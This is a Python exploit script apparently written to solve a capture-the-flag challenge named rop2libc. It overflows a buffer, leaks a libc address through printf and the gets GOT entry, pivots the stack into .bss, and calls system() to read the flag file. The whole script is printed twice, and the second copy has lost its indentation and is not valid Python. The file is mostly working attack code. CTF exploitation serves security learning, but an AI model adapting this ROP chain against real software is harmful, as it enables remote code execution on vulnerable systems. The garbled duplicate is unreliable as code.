st98/pwn.py

## pwn.py
import struct
from subprocess import *

def p64(x):
  return struct.pack('<Q', x)

def u64(x):
  return struct.unpack('<Q', x)[0]

def read_until(f, s):
  res = ''
  while not res.endswith(s):
    res += f.read(1)
  return res

addr_pop_rdi = 0x400633
addr_pop_rsi_r15 = 0x400631
addr_pop_rbp = 0x4004d5
addr_leave = 0x4005a7
addr_printf = 0x400450
addr_gets = 0x400480
addr_bss = 0x601048

addr_got_gets = 0x601030
addr_str = 0x400654 # "... %s"

offset_libc_gets = 0x6f440
offset_libc_system = 0x46640
offset_libc_exit = 0x3c290

p = Popen('/problems/rop2libc/rop2libc', stdin=PIPE, stdout=PIPE, stderr=PIPE)

payload = ''
payload += 'A' * 72
# leak address
payload += p64(addr_pop_rdi)
payload += p64(addr_str)
payload += p64(addr_pop_rsi_r15)
payload += p64(addr_got_gets)
payload += p64(0x4242424242424242)
payload += p64(addr_printf)
# flush
payload += p64(addr_pop_rdi)
payload += p64(addr_bss)
payload += p64(addr_gets)
payload += p64(addr_pop_rdi)
payload += p64(addr_bss)
payload += p64(addr_printf)
payload += p64(addr_pop_rdi)
payload += p64(addr_bss)
payload += p64(addr_printf)
# stack pivot
payload += p64(addr_pop_rdi)
payload += p64(addr_bss+0x802)
payload += p64(addr_gets)
payload += p64(addr_pop_rbp)
payload += p64(addr_bss+0x802)
payload += p64(addr_leave)

padding = ''
padding += 'cat /problems/rop2libc/flag.txt && '
padding += 'A' * (0x800 - len(padding))

p.stdin.write(payload + '\n')
p.stdin.write(padding + '\n')

read_until(p.stdout, 'said: ')
read_until(p.stdout, 'said: ')

t = read_until(p.stdout, '\n')[:-1]
libc_base = u64(t.ljust(8, '\0')) - offset_libc_gets

stack = ''
stack += 'AAAAAAAA'
stack += p64(addr_pop_rdi)
stack += p64(addr_bss)
stack += p64(libc_base + offset_libc_system)
stack += p64(libc_base + offset_libc_exit)

p.stdin.write(stack + '\n')

print p.stdout.read()
	import struct
	from subprocess import *

	def p64(x):
	return struct.pack('<Q', x)

	def u64(x):
	return struct.unpack('<Q', x)[0]

	def read_until(f, s):
	res = ''
	while not res.endswith(s):
	res += f.read(1)
	return res

	addr_pop_rdi = 0x400633
	addr_pop_rsi_r15 = 0x400631
	addr_pop_rbp = 0x4004d5
	addr_leave = 0x4005a7
	addr_printf = 0x400450
	addr_gets = 0x400480
	addr_bss = 0x601048

	addr_got_gets = 0x601030
	addr_str = 0x400654 # "... %s"

	offset_libc_gets = 0x6f440
	offset_libc_system = 0x46640
	offset_libc_exit = 0x3c290

	p = Popen('/problems/rop2libc/rop2libc', stdin=PIPE, stdout=PIPE, stderr=PIPE)

	payload = ''
	payload += 'A' * 72
	# leak address
	payload += p64(addr_pop_rdi)
	payload += p64(addr_str)
	payload += p64(addr_pop_rsi_r15)
	payload += p64(addr_got_gets)
	payload += p64(0x4242424242424242)
	payload += p64(addr_printf)
	# flush
	payload += p64(addr_pop_rdi)
	payload += p64(addr_bss)
	payload += p64(addr_gets)
	payload += p64(addr_pop_rdi)
	payload += p64(addr_bss)
	payload += p64(addr_printf)
	payload += p64(addr_pop_rdi)
	payload += p64(addr_bss)
	payload += p64(addr_printf)
	# stack pivot
	payload += p64(addr_pop_rdi)
	payload += p64(addr_bss+0x802)
	payload += p64(addr_gets)
	payload += p64(addr_pop_rbp)
	payload += p64(addr_bss+0x802)
	payload += p64(addr_leave)

	padding = ''
	padding += 'cat /problems/rop2libc/flag.txt && '
	padding += 'A' * (0x800 - len(padding))

	p.stdin.write(payload + '\n')
	p.stdin.write(padding + '\n')

	read_until(p.stdout, 'said: ')
	read_until(p.stdout, 'said: ')

	t = read_until(p.stdout, '\n')[:-1]
	libc_base = u64(t.ljust(8, '\0')) - offset_libc_gets

	stack = ''
	stack += 'AAAAAAAA'
	stack += p64(addr_pop_rdi)
	stack += p64(addr_bss)
	stack += p64(libc_base + offset_libc_system)
	stack += p64(libc_base + offset_libc_exit)

	p.stdin.write(stack + '\n')

	print p.stdout.read()